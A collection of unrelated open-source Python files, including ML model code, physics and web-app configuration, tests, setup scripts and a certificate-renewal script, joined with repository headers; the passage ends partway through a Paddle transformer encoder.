image1, image2 = padder.pad(image1, image2)
_, flow_up = model(image1, image2, iters=args.valid_iters, test_mode=True)
file_stem = imfile1.split('/')[-2]
if args.save_numpy:
np.save(output_directory / f"{file_stem}.npy", flow_up.cpu().numpy().squeeze())
plt.imsave(output_directory / f"{file_stem}.png", -flow_up.cpu().numpy().squeeze(), cmap='jet')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--restore_ckpt', help="restore checkpoint", required=True)
parser.add_argument('--save_numpy', action='store_true', help='save output as numpy arrays')
parser.add_argument('-l', '--left_imgs', help="path to all first (left) frames", default="datasets/Middlebury/MiddEval3/testH/*/im0.png")
parser.add_argument('-r', '--right_imgs', help="path to all second (right) frames", default="datasets/Middlebury/MiddEval3/testH/*/im1.png")
parser.add_argument('--output_directory', help="directory to save output", default="demo_output")
parser.add_argument('--mixed_precision', action='store_true', help='use mixed precision')
parser.add_argument('--valid_iters', type=int, default=32, help='number of flow-field updates during forward pass')
# Architecture choices
parser.add_argument('--hidden_dims', nargs='+', type=int, default=[128]*3, help="hidden state and context dimensions")
parser.add_argument('--corr_implementation', choices=["reg", "alt", "reg_cuda", "alt_cuda"], default="reg", help="correlation volume implementation")
parser.add_argument('--shared_backbone', action='store_true', help="use a single backbone for the context and feature encoders")
parser.add_argument('--corr_levels', type=int, default=4, help="number of levels in the correlation pyramid")
parser.add_argument('--corr_radius', type=int, default=4, help="width of the correlation pyramid")
parser.add_argument('--n_downsample', type=int, default=2, help="resolution of the disparity field (1/2^K)")
parser.add_argument('--slow_fast_gru', action='store_true', help="iterate the low-res GRUs more frequently")
parser.add_argument('--n_gru_layers', type=int, default=3, help="number of hidden GRU levels")
args = parser.parse_args()
demo(args)
|
JetMETCorrections/Type1MET/python/pfMETCorrectionType0_cfi.py | ckamtsikis/cmssw | 852 | 12697796 | import FWCore.ParameterSet.Config as cms
#--------------------------------------------------------------------------------
# select collection of "good" collision vertices
selectedVerticesForPFMEtCorrType0 = cms.EDFilter("VertexSelector",
src = cms.InputTag('offlinePrimaryVertices'),
cut = cms.string("isValid & ndof >= 4 & chi2 > 0 & tracksSize > 0 & abs(z) < 24 & abs(position.Rho) < 2."),
filter = cms.bool(False)
)
selectedPrimaryVertexHighestPtTrackSumForPFMEtCorrType0 = cms.EDFilter("PATSingleVertexSelector",
mode = cms.string('firstVertex'),
vertices = cms.InputTag('selectedVerticesForPFMEtCorrType0'),
filter = cms.bool(False)
)
#--------------------------------------------------------------------------------
#--------------------------------------------------------------------------------
# association of PFCandidates to vertices
from RecoParticleFlow.PFTracking.particleFlowDisplacedVertex_cfi import particleFlowDisplacedVertex
from TrackingTools.TransientTrack.TransientTrackBuilder_cfi import *
from CommonTools.RecoUtils.pfcand_assomap_cfi import PFCandAssoMap as _PFCandAssoMap
pfCandidateToVertexAssociation = _PFCandAssoMap.clone(
PFCandidateCollection = cms.InputTag('particleFlow'),
UseBeamSpotCompatibility = cms.untracked.bool(True),
ignoreMissingCollection = cms.bool(True)
)
#--------------------------------------------------------------------------------
#--------------------------------------------------------------------------------
# produce Type 0 MET corrections
pfMETcorrType0 = cms.EDProducer("Type0PFMETcorrInputProducer",
srcPFCandidateToVertexAssociations = cms.InputTag('pfCandidateToVertexAssociation'),
srcHardScatterVertex = cms.InputTag('selectedPrimaryVertexHighestPtTrackSumForPFMEtCorrType0'),
correction = cms.PSet(
# RunI correction
# formula = cms.string("-([0] + [1]*x)*(1.0 + TMath::Erf(-[2]*TMath::Power(x, [3])))"),
# par0 = cms.double(0.),
# par1 = cms.double(-0.703151),
# par2 = cms.double(0.0303531),
# par3 = cms.double(0.909209)
formula = cms.string("(x<35)?(-( [0]+x*[1]+pow(x, 2)*[2]+pow(x, 3)*[3] )):(-( [0]+35*[1]+pow(35, 2)*[2]+pow(35, 3)*[3] ))"),
par0 = cms.double(-1.81414e-01),
par1 = cms.double(-4.76934e-01),
par2 = cms.double(8.63564e-03),
par3 = cms.double(-4.94181e-05)
),
minDz = cms.double(0.2) # [cm], minimum distance required between pile-up vertices and "hard scatter" vertex
)
#--------------------------------------------------------------------------------
type0PFMEtCorrectionPFCandToVertexAssociationTask = cms.Task(
selectedVerticesForPFMEtCorrType0,
selectedPrimaryVertexHighestPtTrackSumForPFMEtCorrType0,
particleFlowDisplacedVertex,
pfCandidateToVertexAssociation
)
type0PFMEtCorrectionPFCandToVertexAssociation = cms.Sequence(
type0PFMEtCorrectionPFCandToVertexAssociationTask
)
type0PFMEtCorrectionPFCandToVertexAssociationForValidation = cms.Sequence(
type0PFMEtCorrectionPFCandToVertexAssociationTask
)
type0PFMEtCorrectionPFCandToVertexAssociationForValidationMiniAOD = cms.Sequence(
type0PFMEtCorrectionPFCandToVertexAssociationTask
)
type0PFMEtCorrectionTask = cms.Task(
type0PFMEtCorrectionPFCandToVertexAssociationTask,
pfMETcorrType0
)
type0PFMEtCorrection = cms.Sequence(
type0PFMEtCorrectionTask
)
|
src/zvt/recorders/sina/money_flow/__init__.py | vishalbelsare/zvt | 2,032 | 12697817 | # the __all__ is generated
__all__ = []
# __init__.py structure:
# common code of the package
# export interface in __all__ which contains __all__ of its sub modules
# import all from submodule sina_block_money_flow_recorder
from .sina_block_money_flow_recorder import *
from .sina_block_money_flow_recorder import __all__ as _sina_block_money_flow_recorder_all
__all__ += _sina_block_money_flow_recorder_all
# import all from submodule sina_stock_money_flow_recorder
from .sina_stock_money_flow_recorder import *
from .sina_stock_money_flow_recorder import __all__ as _sina_stock_money_flow_recorder_all
__all__ += _sina_stock_money_flow_recorder_all
|
examples/misc/flaskexamples/flaskcelery/flask_source/FlaskEchoApp.py | takipsizad/pyjs | 739 | 12697822 | <reponame>takipsizad/pyjs
from flask import Flask
from requests import JSONRPCRequest
from views import json_echo, echo
from method_views import JSONEchoView
Flask.request_class = JSONRPCRequest
def create_app():
app = Flask("FlaskEchoApp")
app.config.from_pyfile("celeryconfig.py")
# Register the blueprint version of the echoer
app.register_blueprint(json_echo, url_prefix="/json_echo")
# Register the modelview version of the echoer
app.add_url_rule(
"/json_echo_class", view_func=JSONEchoView.as_view("json_echo_class"))
return app
|
exercises/crypto-square/crypto_square.py | kishankj/python | 1,177 | 12697838 | def cipher_text(plain_text):
pass
|
actions/list_users.py | cognifloyd/stackstorm-yammer | 164 | 12697849 | <filename>actions/list_users.py
from lib.actions import YammerAction
__all__ = [
'ListUsersAction'
]
class ListUsersAction(YammerAction):
def run(self, page=None, letter=None,
sort_by=None, reverse=None):
yammer = self.authenticate()
users = yammer.users.all(page=page, letter=letter, sort_by=sort_by,
reverse=reverse)
return users
|
static/scripts/renew_certs.py | qbert2k/jans-setup | 178 | 12697878 | <gh_stars>100-1000
import os
prop_file = '/install/community-edition-setup/setup.properties.last'
prop = {}
for l in open(prop_file):
ls=l.strip()
n = ls.find('=')
if not ls.startswith('#'):
key = ls[:n]
val = ls[n+1:].strip()
val = val.replace('\\=','=').replace('\\:',':')
prop[key] = val
def delete_key(suffix):
defaultTrustStorePW = '<PASSWORD>'
defaultTrustStoreFN = '/opt/jre/jre/lib/security/cacerts'
cert = '/etc/certs/{0}.crt'.format(suffix)
if os.path.exists(cert):
cmd=' '.join([
'/opt/jre/bin/keytool', "-delete", "-alias",
"%s_%s" % (prop['hostname'], suffix),
"-keystore", defaultTrustStoreFN,
"-storepass", defaultTrustStorePW
])
os.system(cmd)
def import_key(suffix):
defaultTrustStorePW = '<PASSWORD>'
defaultTrustStoreFN = '/opt/jre/jre/lib/security/cacerts'
certFolder = '/etc/certs'
public_certificate = '%s/%s.crt' % (certFolder, suffix)
cmd =' '.join([
'/opt/jre/bin/keytool', "-import", "-trustcacerts",
"-alias", "%s_%s" % (prop['hostname'], suffix),
"-file", public_certificate, "-keystore",
defaultTrustStoreFN,
"-storepass", defaultTrustStorePW, "-noprompt"
])
os.system(cmd)
def create_new_certs():
print "Creating certificates"
cmd_list = [
'/usr/bin/openssl genrsa -des3 -out /etc/certs/{0}.key.orig -passout pass:secret 2048',
'/usr/bin/openssl rsa -in /etc/certs/{0}.key.orig -passin pass:secret -out /etc/certs/{0}.key',
'/usr/bin/openssl req -new -key /etc/certs/{0}.key -out /etc/certs/{0}.csr -subj '
'"/C={4}/ST={5}/L={1}/O=Gluu/CN={2}/emailAddress={3}"'.format('{0}', prop['city'], prop['hostname'], prop['admin_email'] , prop['countryCode'] , prop['state']),
'/usr/bin/openssl x509 -req -days 365 -in /etc/certs/{0}.csr -signkey /etc/certs/{0}.key -out /etc/certs/{0}.crt',
'chown root:gluu /etc/certs/{0}.key.orig',
'chmod 700 /etc/certs/{0}.key.orig',
'chown root:gluu /etc/certs/{0}.key',
'chmod 700 /etc/certs/{0}.key',
]
cert_list = ['httpd', 'asimba', 'idp-encryption', 'idp-signing', 'shibIDP', 'saml.pem']
for crt in cert_list:
for cmd in cmd_list:
cmd = cmd.format(crt)
os.system(cmd)
if not crt == 'saml.pem':
delete_key(crt)
import_key(crt)
os.rename('/etc/certs/saml.pem.crt', '/etc/certs/saml.pem')
os.system('chown jetty:jetty /etc/certs/oxauth-keys.*')
create_new_certs()
|
setup.py | PingCheng-Wei/SD-MaskRCNN | 183 | 12697966 | <gh_stars>100-1000
"""
Setup of SD Mask RCNN codebase
Author: <NAME>
"""
import os
from setuptools import setup
root_dir = os.path.dirname(os.path.realpath(__file__))
# load __version__
version_file = 'sd_maskrcnn/version.py'
exec(open(version_file).read())
# load README.md as long_description
long_description = ''
if os.path.exists('README.md'):
with open('README.md', 'r') as f:
long_description = f.read()
setup_requirements = [
'Cython',
'numpy'
]
requirements = [
'pycocotools>=2.0', # For benchmarking
'scikit-image>=0.14.2', # For image loading
'keras>=2.2<2.3', # For training
'tqdm', # For pretty progress bars
'matplotlib', # For visualization of results
'h5py<3.0.0', # Loading pretrained models
'autolab_core>=1.1.0', # For core utilities
'nvidia-tensorflow', # For training - need TF 1.15 so use nvidia
f'mask-rcnn @ file://localhost{root_dir}/maskrcnn'
# Underlying Mask RCNN model
]
generation_requirements = [
'gym>=0.11', # For sampling heaps
'pyglet==1.4.0b1', # For pyrender
'pyrender>=0.1.23', # For rendering images
'pybullet', # For dynamic sim
'trimesh[easy]', # For mesh loading/exporting
'scipy' # For random vars
]
setup(
name='sd_maskrcnn',
version=__version__,
description='SD Mask RCNN project code',
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
url='http://github.com/BerkeleyAutomation/sd-maskrcnn',
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
'Natural Language :: English',
'Topic :: Scientific/Engineering'
],
packages=['sd_maskrcnn', 'sd_maskrcnn.envs'],
package_data={'sd_maskrcnn': ['data/plane/*', 'data/bin/*']},
setup_requires=setup_requirements,
install_requires=requirements,
extras_require={
'generation': generation_requirements
}
)
|
test/integ/test_put_get_with_aws_token.py | jurecuhalev/snowflake-connector-python | 311 | 12698010 | <filename>test/integ/test_put_get_with_aws_token.py<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2021 Snowflake Computing Inc. All rights reserved.
#
import glob
import gzip
import os
import pytest
from snowflake.connector.constants import UTF8
try: # pragma: no cover
from snowflake.connector.vendored import requests
except ImportError:
requests = None
try: # pragma: no cover
from snowflake.connector.file_transfer_agent import (
SnowflakeFileMeta,
StorageCredential,
)
from snowflake.connector.s3_storage_client import S3Location, SnowflakeS3RestClient
except ImportError:
pass
from ..integ_helpers import put
from ..randomize import random_string
# Mark every test in this module as an aws test
pytestmark = pytest.mark.aws
@pytest.mark.parametrize(
"from_path", [True, pytest.param(False, marks=pytest.mark.skipolddriver)]
)
def test_put_get_with_aws(tmpdir, conn_cnx, from_path):
"""[s3] Puts and Gets a small text using AWS S3."""
# create a data file
fname = str(tmpdir.join("test_put_get_with_aws_token.txt.gz"))
original_contents = "123,test1\n456,test2\n"
with gzip.open(fname, "wb") as f:
f.write(original_contents.encode(UTF8))
tmp_dir = str(tmpdir.mkdir("test_put_get_with_aws_token"))
table_name = random_string(5, "snow9144_")
with conn_cnx() as cnx:
with cnx.cursor() as csr:
try:
csr.execute(f"create or replace table {table_name} (a int, b string)")
file_stream = None if from_path else open(fname, "rb")
put(
csr,
fname,
f"%{table_name}",
from_path,
sql_options=" auto_compress=true parallel=30",
file_stream=file_stream,
)
rec = csr.fetchone()
assert rec[6] == "UPLOADED"
csr.execute(f"copy into {table_name}")
csr.execute(f"rm @%{table_name}")
assert csr.execute(f"ls @%{table_name}").fetchall() == []
csr.execute(
f"copy into @%{table_name} from {table_name} "
"file_format=(type=csv compression='gzip')"
)
csr.execute(f"get @%{table_name} file://{tmp_dir}")
rec = csr.fetchone()
assert rec[0].startswith("data_"), "A file downloaded by GET"
assert rec[1] == 36, "Return right file size"
assert rec[2] == "DOWNLOADED", "Return DOWNLOADED status"
assert rec[3] == "", "Return no error message"
finally:
csr.execute(f"drop table {table_name}")
if file_stream:
file_stream.close()
files = glob.glob(os.path.join(tmp_dir, "data_*"))
with gzip.open(files[0], "rb") as fd:
contents = fd.read().decode(UTF8)
assert original_contents == contents, "Output is different from the original file"
@pytest.mark.skipolddriver
def test_put_with_invalid_token(tmpdir, conn_cnx):
"""[s3] SNOW-6154: Uses invalid combination of AWS credential."""
# create a data file
fname = str(tmpdir.join("test_put_get_with_aws_token.txt.gz"))
with gzip.open(fname, "wb") as f:
f.write("123,test1\n456,test2".encode(UTF8))
table_name = random_string(5, "snow6154_")
with conn_cnx() as cnx:
try:
cnx.cursor().execute(
f"create or replace table {table_name} (a int, b string)"
)
ret = cnx.cursor()._execute_helper(f"put file://{fname} @%{table_name}")
stage_info = ret["data"]["stageInfo"]
stage_info["location"]
stage_credentials = stage_info["creds"]
creds = StorageCredential(
stage_credentials, cnx, "COMMAND WILL NOT BE USED"
)
statinfo = os.stat(fname)
meta = SnowflakeFileMeta(
name=os.path.basename(fname),
src_file_name=fname,
src_file_size=statinfo.st_size,
stage_location_type="S3",
encryption_material=None,
dst_file_name=os.path.basename(fname),
sha256_digest="None",
)
client = SnowflakeS3RestClient(meta, creds, stage_info, 8388608)
client.get_file_header(meta.name) # positive case
# negative case, no aws token
token = stage_info["creds"]["AWS_TOKEN"]
del stage_info["creds"]["AWS_TOKEN"]
with pytest.raises(requests.HTTPError, match=".*Forbidden for url.*"):
client.get_file_header(meta.name)
# negative case, wrong location
stage_info["creds"]["AWS_TOKEN"] = token
s3path = client.s3location.path
bad_path = os.path.dirname(os.path.dirname(s3path)) + "/"
_s3location = S3Location(client.s3location.bucket_name, bad_path)
client.s3location = _s3location
client.chunks = [b"this is a chunk"]
client.num_of_chunks = 1
client.retry_count[0] = 0
client.data_file = fname
with pytest.raises(requests.HTTPError, match=".*Forbidden for url.*"):
client.upload_chunk(0)
finally:
cnx.cursor().execute(f"drop table if exists {table_name}")
|
tests/functional/context_methods/test_var_in_generate_name.py | tomasfarias/dbt-core | 799 | 12698036 | import pytest
from dbt.tests.util import run_dbt, update_config_file
from dbt.exceptions import CompilationException
model_sql = """
select 1 as id
"""
bad_generate_macros__generate_names_sql = """
{% macro generate_schema_name(custom_schema_name, node) -%}
{% do var('somevar') %}
{% do return(dbt.generate_schema_name(custom_schema_name, node)) %}
{%- endmacro %}
"""
class TestMissingVarGenerateNameMacro:
@pytest.fixture(scope="class")
def macros(self):
return {"generate_names.sql": bad_generate_macros__generate_names_sql}
@pytest.fixture(scope="class")
def models(self):
return {"model.sql": model_sql}
def test_generate_schema_name_var(self, project):
# var isn't set, so generate_name macro fails
with pytest.raises(CompilationException) as excinfo:
run_dbt(["compile"])
assert "Required var 'somevar' not found in config" in str(excinfo.value)
# globally scoped -- var is set at top-level
update_config_file({"vars": {"somevar": 1}}, project.project_root, "dbt_project.yml")
run_dbt(["compile"])
# locally scoped -- var is set in 'test' scope
update_config_file(
{"vars": {"test": {"somevar": 1}}}, project.project_root, "dbt_project.yml"
)
run_dbt(["compile"])
|
pomdpy/solvers/linear_alpha_net.py | watabe951/POMDPy | 210 | 12698040 | from __future__ import absolute_import
import os
import numpy as np
import tensorflow as tf
from experiments.scripts.pickle_wrapper import save_pkl, load_pkl
from .ops import simple_linear, select_action_tf, clipped_error
from .alpha_vector import AlphaVector
from .base_tf_solver import BaseTFSolver
class LinearAlphaNet(BaseTFSolver):
"""
Linear Alpha Network
- linear FA for alpha vectors
- 6 inputs (r(s,a))
- 6 outputs (1 hyperplane per action)
"""
def __init__(self, agent, sess):
super(LinearAlphaNet, self).__init__(agent, sess)
self.ops = {}
self.w = {}
self.summary_ops = {}
self.summary_placeholders = {}
self.w_input = {}
self.w_assign_op = {}
self.build_linear_network()
with tf.variable_scope('step'):
self.step_op = tf.Variable(0, trainable=False, name='step')
self.step_input = tf.placeholder('int32', None, name='step_input')
self.step_assign_op = self.step_op.assign(self.step_input)
tf.global_variables_initializer().run()
@staticmethod
def reset(agent, sess):
return LinearAlphaNet(agent, sess)
def train(self, epoch):
start_step = self.step_assign_op.eval({self.step_input: epoch * self.model.max_steps})
total_reward, avg_reward_per_step, total_loss, total_v, total_delta = 0., 0., 0., 0., 0.
actions = []
# Reset for new run
belief = self.model.get_initial_belief_state()
for step in range(start_step, start_step + self.model.max_steps):
# 1. predict
action, pred_v = self.e_greedy_predict(belief, step)
# 2. act
step_result = self.model.generate_step(action)
if step_result.is_terminal:
v_b_next = np.array([0.])
else:
next_belief = self.model.belief_update(belief, action, step_result.observation)
# optionally clip reward
# generate target
_, v_b_next = self.greedy_predict(next_belief)
target_v = self.model.discount * (step_result.reward + v_b_next)
# compute gradient and do weight update
_, loss, delta = self.gradients(target_v, belief, step)
total_loss += loss
total_reward += step_result.reward
total_v += pred_v[0]
total_delta += delta[0]
if step_result.is_terminal:
# Reset for new run
belief = self.model.get_initial_belief_state()
actions.append(action)
avg_reward_per_step = total_reward / (step + 1.)
avg_loss = loss / (step + 1.)
avg_v = total_v / (step + 1.)
avg_delta = total_delta / (step + 1.)
self.step_assign_op.eval({self.step_input: step + 1})
self.inject_summary({
'average.reward': avg_reward_per_step,
'average.loss': avg_loss,
'average.v': avg_v,
'average.delta': avg_delta,
'training.weights': self.sess.run(self.w['l1_w'], feed_dict={
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: belief}),
'training.learning_rate': self.ops['learning_rate_op'].eval(
{self.ops['learning_rate_step']: step + 1}),
'training.epsilon': self.ops['epsilon_op'].eval(
{self.ops['epsilon_step']: step + 1})
}, step + 1)
def e_greedy_predict(self, belief, epsilon_step):
# try hard-coding input of linear net to be rewards (can try random as well)
action, v_b, epsilon = self.sess.run([self.ops['a'], self.ops['v_b'], self.ops['epsilon_op']],
feed_dict={
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: belief,
self.ops['epsilon_step']: epsilon_step})
# e-greedy action selection
if np.random.uniform(0, 1) < epsilon:
action = np.random.randint(self.model.num_actions)
return action, v_b
def greedy_predict(self, belief):
# try hard-coding input of linear net to be rewards (can try random as well)
action, v_b = self.sess.run([self.ops['a'], self.ops['v_b']],
feed_dict={
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: belief})
return action, v_b
def gradients(self, target_v, belief, learning_rate_step):
return self.sess.run([self.ops['optim'], self.ops['loss'], self.ops['delta']], feed_dict={
self.ops['target_v']: target_v,
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: belief,
self.ops['learning_rate_step']: learning_rate_step})
def alpha_vectors(self):
gamma = self.sess.run(self.ops['l1_out'], feed_dict={
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: self.model.get_initial_belief_state()
})
gamma = np.reshape(gamma, [self.model.num_actions, self.model.num_states])
vector_set = set()
for i in range(self.model.num_actions):
vector_set.add(AlphaVector(a=i, v=gamma[i]))
return vector_set
def build_linear_network(self):
with tf.variable_scope('linear_fa_prediction'):
self.ops['belief'] = tf.placeholder('float32', [self.model.num_states], name='belief_input')
with tf.name_scope('linear_layer'):
self.ops['l0_in'] = tf.placeholder('float32', [1, self.model.num_states *
self.model.num_actions], name='input')
self.ops['l1_out'], self.w['l1_w'], self.w['l1_b'] = simple_linear(self.ops['l0_in'],
activation_fn=None, name='weights')
self.ops['l1_out'] = tf.reshape(self.ops['l1_out'], [self.model.num_actions,
self.model.num_states], name='output')
with tf.variable_scope('action_selection'):
vector_set = set()
for i in range(self.model.num_actions):
vector_set.add(AlphaVector(a=i, v=self.ops['l1_out'][i, :]))
self.ops['a'], self.ops['v_b'] = select_action_tf(self.ops['belief'], vector_set)
with tf.variable_scope('epsilon_greedy'):
self.ops['epsilon_step'] = tf.placeholder('int64', None, name='epsilon_step')
self.ops['epsilon_op'] = tf.maximum(self.model.epsilon_minimum,
tf.train.exponential_decay(
self.model.epsilon_start,
self.ops['epsilon_step'],
self.model.epsilon_decay_step,
self.model.epsilon_decay,
staircase=True))
with tf.variable_scope('linear_optimizer'):
# MSE loss function
self.ops['target_v'] = tf.placeholder('float32', [None], name='target_v')
self.ops['delta'] = self.ops['target_v'] - self.ops['v_b']
# self.ops['clipped_delta'] = tf.clip_by_value(self.ops['delta'], -1, 1, name='clipped_delta')
# L2 regularization
self.ops['loss'] = tf.reduce_mean(clipped_error(self.ops['delta']) +
self.model.beta * tf.nn.l2_loss(self.w['l1_w']) +
self.model.beta * tf.nn.l2_loss(self.w['l1_b']), name='loss')
self.ops['learning_rate_step'] = tf.placeholder('int64', None, name='learning_rate_step')
self.ops['learning_rate_op'] = tf.maximum(self.model.learning_rate_minimum,
tf.train.exponential_decay(
self.model.learning_rate,
self.ops['learning_rate_step'],
self.model.learning_rate_decay_step,
self.model.learning_rate_decay,
staircase=True))
self.ops['optim'] = tf.train.MomentumOptimizer(self.ops['learning_rate_op'], momentum=0.8,
name='Optimizer'). \
minimize(self.ops['loss'])
with tf.variable_scope('linear_fa_summary'):
scalar_summary_tags = ['average.reward', 'average.loss', 'average.v',
'average.delta', 'training.learning_rate', 'training.epsilon']
for tag in scalar_summary_tags:
self.summary_placeholders[tag] = tf.placeholder('float32', None, name=tag.replace(' ', '_'))
self.summary_ops['{}'.format(tag)] = tf.summary.scalar('{}'.format(tag),
self.summary_placeholders[tag])
self.summary_placeholders['training.weights'] = tf.placeholder('float32', [1, 6],
name='training_weights')
self.summary_ops['training.weights'] = tf.summary.histogram('weights',
self.summary_placeholders['training.weights'])
self.summary_ops['writer'] = tf.summary.FileWriter(self.model.logs, self.sess.graph)
self.summary_ops['saver'] = tf.train.Saver(self.w, max_to_keep=30)
self.load_model()
def inject_summary(self, tag_dict, step):
summary_str_lists = self.sess.run([self.summary_ops['{}'.format(tag)] for tag in tag_dict.keys()], feed_dict={
self.summary_placeholders[tag]: value for tag, value in tag_dict.items()
})
for summary_str in summary_str_lists:
self.summary_ops['writer'].add_summary(summary_str, step)
def save_weight_to_pkl(self):
if not os.path.exists(self.model.weight_dir):
os.makedirs(self.model.weight_dir)
for name in self.w.keys():
save_pkl(self.w[name].eval(), os.path.join(self.model.weight_dir, "%s.pkl" % name))
def load_weight_from_pkl(self):
with tf.variable_scope('load_pred_from_pkl'):
for name in self.w.keys():
self.w_input[name] = tf.placeholder('float32', self.w[name].get_shape().as_list(), name=name)
self.w_assign_op[name] = self.w[name].assign(self.w_input[name])
for name in self.w.keys():
self.w_assign_op[name].eval({self.w_input[name]: load_pkl(os.path.join(self.model.weight_dir, "%s.pkl" % name))})
def save_alpha_vectors(self):
if not os.path.exists(self.model.weight_dir):
os.makedirs(self.model.weight_dir)
av = self.alpha_vectors()
save_pkl(av, os.path.join(self.model.weight_dir, "linear_alpha_net_vectors.pkl"))
|
plans/management/commands/autorenew_accounts.py | feedgurus/django-plans | 240 | 12698050 | from django.core.management import BaseCommand
from plans import tasks
class Command(BaseCommand):
help = 'Autorenew accounts and with recurring payments'
def handle(self, *args, **options): # pragma: no cover
self.stdout.write("Starting renewal")
renewed_accounts = tasks.autorenew_account()
if renewed_accounts:
self.stdout.write("Accounts autorenewed: " + ", ".join(str(s) for s in renewed_accounts))
else:
self.stdout.write("No accounts autorenewed")
|
NLP/EMNLP2021-SgSum/src/models/encoder.py | zhangyimi/Research | 1,319 | 12698084 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transformer encoder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid.layers as layers
from models.neural_modules import positionwise_feed_forward, \
pre_process_layer, post_process_layer
from models.attention import multi_head_attention, multi_head_pooling, \
multi_head_structure_attention
def transformer_encoder_layer(query_input,
key_input,
attn_bias,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name=''):
"""The encoder layers that can be stacked to form a deep encoder.
This module consits of a multi-head (self) attention followed by
position-wise feed-forward networks and both the two components companied
with the post_process_layer to add residual connection, layer normalization
and droput.
"""
key_input = pre_process_layer(
key_input,
preprocess_cmd,
prepostprocess_dropout,
name=name + '_pre_att') if key_input else None
value_input = key_input if key_input else None
attn_output = multi_head_attention(
pre_process_layer(
query_input,
preprocess_cmd,
prepostprocess_dropout,
name=name + '_pre_att'),
key_input,
value_input,
attn_bias,
d_key,
d_value,
d_model,
n_head,
attention_dropout,
param_initializer=param_initializer,
name=name + '_multi_head_att')
attn_output = post_process_layer(
query_input,
attn_output,
postprocess_cmd,
prepostprocess_dropout,
name=name + '_post_att')
ffd_output = positionwise_feed_forward(
pre_process_layer(
attn_output,
preprocess_cmd,
prepostprocess_dropout,
name=name + '_pre_ffn'),
d_inner_hid,
d_model,
relu_dropout,
hidden_act,
param_initializer=param_initializer,
name=name + '_ffn')
return post_process_layer(
attn_output,
ffd_output,
postprocess_cmd,
prepostprocess_dropout,
name=name + '_post_ffn')
def transformer_encoder(enc_input,
attn_bias,
n_layer,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name='transformer_encoder',
with_post_process=True):
"""
The encoder is composed of a stack of identical layers returned by calling
encoder_layer.
"""
for i in range(n_layer):
enc_output = transformer_encoder_layer(
enc_input,
None,
attn_bias,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
param_initializer=param_initializer,
name=name + '_layer_' + str(i))
enc_input = enc_output
if with_post_process:
enc_output = pre_process_layer(
enc_output, preprocess_cmd, prepostprocess_dropout, name="post_encoder")
return enc_output
def self_attention_pooling_layer(enc_input,
attn_bias,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
n_block,
preprocess_cmd="n",
postprocess_cmd="da",
name='self_attention_pooling'):
"""
enc_input: # (batch_size, n_tokens, emb_dim)
attn_bias: # (batch_size, n_head, n_tokens, n_tokens)
"""
attn_output = multi_head_pooling(
keys=pre_process_layer(enc_input,
preprocess_cmd,
prepostprocess_dropout,
name=name + '_pre'), # add layer normalization
values=None,
attn_bias=attn_bias, # (batch_size, n_head, n_tokens, n_tokens)
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
name=name
) # (batch_sizes, d_model)
# print("n_block = %s" % n_block)
# print("attn_output.shape = %s" % str(attn_output.shape))
attn_output = layers.reshape(attn_output, shape=[-1, n_block, d_model])
# print("attn_output.shape = %s" % str(attn_output.shape))
pooling_output = layers.dropout(
attn_output,
dropout_prob=attention_dropout,
dropout_implementation="upscale_in_train",
is_test=False)
return pooling_output
def graph_encoder_layer(enc_input, # (batch_size, n_block, emb_dim)
attn_bias, # (batch_size, n_head, n_block, n_block)
graph_attn_bias, # (batch_size, n_head, n_block, n_block)
pos_win,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name=''):
"""
:param enc_input: (batch_size, n_blocks, emb_dim)
:param attn_bias: (batch_size, n_head, n_blocks, n_blocks)
:param graph_attn_bias: (batch_size, n_head, n_blocks, n_blocks)
"""
#layers.Print(enc_input, message="enc_intput ", summarize=-1)
#layers.Print(attn_bias, message="attn_bias", summarize=-1)
#layers.Print(graph_attn_bias, message="graph_attn_bias", summarize=-1)
# (batch_size, n_block, d_model)
attn_output = multi_head_structure_attention(
queries=pre_process_layer(out=enc_input, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_attn'),
keys=None,
values=None,
attn_bias=attn_bias,
graph_attn_bias=graph_attn_bias,
pos_win=pos_win,
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
name=name + '_graph_attn'
)
# add dropout and residual connection
attn_output = post_process_layer(prev_out=enc_input,
out=attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_attn')
ffd_output = positionwise_feed_forward(
